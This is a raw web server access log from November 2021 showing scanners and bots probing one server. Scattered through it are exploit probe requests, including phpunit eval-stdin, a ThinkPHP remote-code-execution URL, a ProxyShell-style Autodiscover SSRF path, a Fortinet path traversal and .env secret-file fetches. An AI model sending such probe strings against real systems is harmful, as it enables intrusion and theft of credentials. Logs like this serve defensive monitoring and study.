(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:38:54 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [05/Nov/2021:13:38:54 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:38:54 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:38:56 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:38:56 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:38:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:39:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:39:00 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:13:39:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:39:01 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:14:56:02 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:14:56:02 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:15:06:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.197.129] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Nov/2021:15:24:36 +0000] 400 - POST http 64.22.31.253 "/10102720" [Client 191.96.168.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [05/Nov/2021:15:46:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [05/Nov/2021:16:52:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.189.111] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Nov/2021:17:06:22 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:17:06:22 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:18:03:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Nov/2021:18:20:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.220.100.252] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [05/Nov/2021:18:20:38 +0000] 400 - - https localhost "-" [Client 199.249.230.87] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:18:20:42 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.100.252] [Length 0] [Gzip -] "-" "-" [05/Nov/2021:18:20:44 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.101.57] [Length 0] [Gzip -] "-" "-" [05/Nov/2021:18:20:53 +0000] 400 - - https localhost "-" [Client 185.220.102.250] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:18:49:03 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [05/Nov/2021:18:51:48 +0000] 444 - GET https imap.moralanimal.net "/" [Client 34.77.162.10] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [05/Nov/2021:19:20:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Nov/2021:19:49:55 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:19:49:55 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:19:49:55 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:19:49:55 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:19:59:02 +0000] 444 - GET https agent.moralanimal.net "/" [Client 45.61.146.242] [Length 0] [Gzip -] "httpx - Open-source project (github.com/projectdiscovery/httpx)" "-" [05/Nov/2021:20:01:00 +0000] 444 - GET https 64.22.31.253 "/webadmin/Index.action" [Client 54.36.108.101] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0" "-" [05/Nov/2021:20:12:52 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [05/Nov/2021:20:38:51 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Nov/2021:20:38:51 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Nov/2021:20:38:51 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Nov/2021:20:38:51 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Nov/2021:20:38:51 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Nov/2021:20:38:51 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Nov/2021:20:51:53 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [05/Nov/2021:23:30:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 118.193.32.180] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [05/Nov/2021:23:31:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.249.246.151] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [05/Nov/2021:23:31:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 118.193.45.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [06/Nov/2021:00:18:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.195] [Length 0] [Gzip -] "-" "-" [06/Nov/2021:00:41:49 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:01:02:49 +0000] 400 - GET http localhost "/ab2g" [Client 206.189.15.60] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:01:02:49 +0000] 400 - GET http localhost "/ab2h" [Client 206.189.15.60] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:01:44:43 +0000] 444 - POST https 64.22.31.253 "/" [Client 206.189.234.161] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [06/Nov/2021:02:35:41 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.107] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Nov/2021:02:50:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 109.94.220.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [06/Nov/2021:05:19:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Nov/2021:05:20:58 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.35] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Nov/2021:05:21:05 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.104.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Nov/2021:05:22:49 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.111.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Nov/2021:06:29:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.80.189.57] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [06/Nov/2021:06:55:57 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Nov/2021:07:07:36 +0000] 400 - GET http localhost "/ab2g" [Client 138.197.69.121] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:07:07:36 +0000] 400 - GET http localhost "/ab2h" [Client 138.197.69.121] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:08:16:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 163.172.212.155] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "-" [06/Nov/2021:08:21:58 +0000] 444 - GET https 64.22.31.253 "//a2billing/customer/templates/default/footer.tpl" [Client 185.40.4.70] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.42.2.el7.x86_64" "-" [06/Nov/2021:09:10:28 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Nov/2021:09:26:06 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.195.203] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Nov/2021:09:35:58 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:09:35:58 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:09:35:59 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:09:45:21 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:23 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:23 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [06/Nov/2021:09:45:25 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:25 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:26 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:26 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:29 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:09:45:30 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:31 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:09:45:33 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Nov/2021:11:04:07 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Nov/2021:11:54:32 +0000] 400 - - http localhost "-" [Client 193.3.19.243] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:13:08:42 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:13:08:42 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:13:08:43 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:13:14:04 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Nov/2021:13:17:26 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 45.61.175.11] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [06/Nov/2021:13:25:20 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.197.181] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Nov/2021:14:43:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Nov/2021:15:10:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.202.222] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Nov/2021:16:18:08 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [06/Nov/2021:16:18:08 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [06/Nov/2021:17:03:53 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Nov/2021:17:03:53 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Nov/2021:17:03:53 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Nov/2021:17:03:53 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Nov/2021:17:03:53 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Nov/2021:17:03:53 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Nov/2021:17:46:49 +0000] 444 - GET https gitlab.moralanimal.net "/users/sign_in" [Client 104.200.146.41] [Length 0] [Gzip -] "-" "-" [06/Nov/2021:17:49:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [06/Nov/2021:18:50:01 +0000] 400 - - http localhost "-" [Client 193.3.19.243] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:19:14:31 +0000] 400 - GET http localhost "/ab2g" [Client 167.172.35.200] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:19:14:31 +0000] 400 - GET http localhost "/ab2h" [Client 167.172.35.200] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:19:40:09 +0000] 444 - GET https 64.22.31.253 "/users/sign_in" [Client 107.152.103.154] [Length 0] [Gzip -] "-" "-" [06/Nov/2021:20:38:33 +0000] 444 - POST https 64.22.31.253 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:55.0) Gecko/20100101 Firefox/55.0" "-" [06/Nov/2021:20:41:01 +0000] 400 - - http localhost "-" [Client 81.169.255.145] [Length 154] [Gzip -] "-" "-" [06/Nov/2021:20:56:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.59] [Length 0] [Gzip -] "-" "-" [06/Nov/2021:20:56:20 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.59] [Length 252] [Gzip -] "-" "-" [06/Nov/2021:20:56:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [06/Nov/2021:21:14:37 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.102] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [06/Nov/2021:21:27:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Nov/2021:22:37:41 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.155.204.227] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [06/Nov/2021:23:07:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Nov/2021:23:16:02 +0000] 400 - GET http 64.22.31.253 "/analytics/jbips/" [Client 194.48.199.78] [Length 252] [Gzip -] "curl/7.64.1" "-" [06/Nov/2021:23:43:41 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Nov/2021:00:09:37 +0000] 400 - - http localhost "-" [Client 89.248.165.120] [Length 154] [Gzip -] "-" "-" [07/Nov/2021:00:17:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.254] [Length 0] [Gzip -] "-" "-" [07/Nov/2021:00:24:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.115] [Length 0] [Gzip -] "-" "-" [07/Nov/2021:00:24:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.115] [Length 252] [Gzip -] "-" "-" [07/Nov/2021:00:24:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.115] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [07/Nov/2021:02:36:02 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.140] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Nov/2021:03:10:04 +0000] 400 - GET http 64.22.31.253 "/" [Client 3.9.118.28] [Length 252] [Gzip -] "'Cloud mapping experiment. Contact research@pdrlabs.net'" "-" [07/Nov/2021:04:19:26 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.83.64.21] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [07/Nov/2021:04:19:26 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 45.83.67.6] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [07/Nov/2021:04:21:45 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Nov/2021:04:30:31 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:04:30:31 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:04:30:33 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" 